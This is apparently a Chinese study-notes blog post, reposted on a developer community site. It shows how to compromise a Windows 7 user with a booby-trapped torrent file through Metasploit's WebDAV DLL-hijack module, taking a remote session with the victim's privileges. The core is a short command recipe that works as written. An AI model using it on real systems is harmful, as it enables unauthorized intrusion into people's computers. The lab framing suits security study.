AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

利用种子文件对windows7的攻击-学习笔记

2018-05-01 994
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/80155813 参考资源:https://www.
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/80155813

参考资源:https://www.youtube.com/watch?v=mILtAIMrLdM

环境:kali2018.1(攻击者),win7任意版本(目标,受害者)

说明:#表示root权限,$表示普通用户权限

操作:

# msfconsole
use exploit/windows/browser/webdav_dll_hijacker
set extensions torrent
set srvhost 攻击者的IP
exploit

此时看到生成的文件被自动放在了一个路径下(需要至少有初中的英文水准去阅读回显内容,才能找到路径)
受害者使用资源管理或者浏览器取访问这个路径
受害者双击种子文件,进行访问。(不少用户的习惯就是这样)
攻击者可以看到,接收到一个会话连接。

sessions -i 1

成功访问受害者,并且得到了访问种子的用户的权限。

文章标签:
Windows
Web App开发
关键词:
Windows攻击
Windows学习笔记
z奶油面包
目录
相关文章
大树营养快线
|
9天前
|
iOS开发 MacOS Windows
Mac air使用Boot Camp安装win10 ,拷贝 Windows 文件时出错
Mac air使用Boot Camp安装win10 ,拷贝 Windows 文件时出错
大树营养快线
65 0
坠入极夜的夏
|
16天前
|
Docker Windows Python
Windows-Docker学习笔记(一)
本文介绍了Windows环境下Docker的安装与使用方法。首先通过链接下载Windows版本的Docker,然后按步骤配置:启用Windows功能、设置默认WSL版本为2,并检查Docker及其组件是否正常工作。接着详细列出了Docker的基础命令及其用法,包括搜索、下载镜像、管理容器等。同时介绍了Dockerfile的编写方法及其构建过程,以及docker-compose.yml文件的用途。最后提供了运行和管理容器的具体示例。
坠入极夜的夏
102 6
Windows-Docker学习笔记(一)
路边两盏灯
|
1月前
|
缓存 NoSQL Linux
【Azure Redis 缓存】Windows和Linux系统本地安装Redis, 加载dump.rdb中数据以及通过AOF日志文件追加数据
【Azure Redis 缓存】Windows和Linux系统本地安装Redis, 加载dump.rdb中数据以及通过AOF日志文件追加数据
路边两盏灯
85 1
【Azure Redis 缓存】Windows和Linux系统本地安装Redis, 加载dump.rdb中数据以及通过AOF日志文件追加数据
路边两盏灯
|
1月前
|
Java Windows 容器
【应用服务 App Service】快速获取DUMP文件(App Service for Windows(.NET/.NET Core))
【应用服务 App Service】快速获取DUMP文件(App Service for Windows(.NET/.NET Core))
路边两盏灯
51 4
。思索
|
1月前
|
Windows
Windows——如何在文件资源管理器地址栏快速打开Vscode
Windows——如何在文件资源管理器地址栏快速打开Vscode
。思索
57 4
。思索
|
1月前
|
Windows
Windows——windows10下如何和子系统Ubuntu18.04互传文件
Windows——windows10下如何和子系统Ubuntu18.04互传文件
。思索
47 1
愿天堂没有BUG(公众号同名)
|
1月前
|
监控 安全 虚拟化
降级攻击可“复活”数以千计的Windows漏洞
在本周举行的黑帽大会(Black Hat 2024)上,安全研究员Alon Leviev曝光了一个微软Windows操作系统的“超级漏洞”,该漏洞使得攻击者可以利用微软更新进程实施降级攻击,“复活”数以千计的微软Windows漏洞,即便是打满补丁的Windows11设备也将变得千疮百孔,脆弱不堪。
愿天堂没有BUG(公众号同名)
34 1
路边两盏灯
|
1月前
|
Python Windows
【Azure 应用服务】App Service For Windows 环境中部署Python站点后,如何继续访问静态资源文件呢(Serving Static Files)?
【Azure 应用服务】App Service For Windows 环境中部署Python站点后,如何继续访问静态资源文件呢(Serving Static Files)?
路边两盏灯
33 0
小狮子安度因1
|
1月前
|
安全 C++ Windows
Windows下C++使用gRPC(Qt和VS,含文件包和使用方法)
Windows下C++使用gRPC(Qt和VS,含文件包和使用方法)
小狮子安度因1
125 0
fruge365
|
2月前
|
Windows
【Windows】 Win10下报错:该文件没有与之关联的应用来执行该操作。请安装应用,若已经安装应用,请在“默认应用设置”页面中创建关联
【Windows】 Win10下报错:该文件没有与之关联的应用来执行该操作。请安装应用,若已经安装应用,请在“默认应用设置”页面中创建关联
fruge365
400 1

热门文章

最新文章

  • 1
    Windows Server入门系列39 管理网络共享
  • 2
    微软Windows Server 2008之三设置TCP/IP
  • 3
    Linux / Windows应用方案不完全对照表
  • 4
    微软职位内部推荐-SW Engineer II for Windows System
  • 5
    快速构建Windows 8风格应用35-触控输入
  • 6
    (C#)Windows Shell 外壳编程系列9 - QueryInfo 扩展提示
  • 7
    Windows Live Writer 技巧2则
  • 8
    [New Portal]Windows Azure Virtual Machine (8) Virtual Machine高可用(上)
  • 9
    微信电脑版也能用公众号自定义菜单 微信1.2 for Windows发布
  • 10
    Windows 8.1 应用再出发 - 几种常用控件
  • 1
    深入浅出:NSSM封装Windows服务工具的使用与介绍
    207
  • 2
    Windows环境下 NVM 介绍、下载安装及使用详解
    547
  • 3
    Windows 程序自启动实现方法详解
    105
  • 4
    Windows文件搜索神器Everything安装配置结合内网穿透实现公网查询本地文件
    70
  • 5
    Windows安装TortoiseSVN客户端结合Cpolar实现公网提交文件到本地服务器
    74
  • 6
    苹果MacOS电脑使用内网穿透轻松远程桌面本地Windows系统电脑
    88
  • 7
    一款.NET开源、简洁易用的Windows桌面小说阅读应用
    82
  • 8
    windows下如何安装git以及IDEA如何配置git
    92
  • 9
    如何在Windows安装Wnmp服务并实现固定地址远程访问
    68
  • 10
    【Flutter前端技术开发专栏】Flutter在桌面应用(Windows/macOS/Linux)的开发实践
    332

    • 相关电子书

    更多
  • 《云服务器运维之Windows篇》
  • TAKING WINDOWS 10 KERNEL
  • ECS运维指南之Windows系统诊断

    • 相关实验场景

    更多
  • 快速配置Windows云服务器
  • 手动搭建FTP站点(Windows)
    • 下一篇
    使用OSS上传下载文件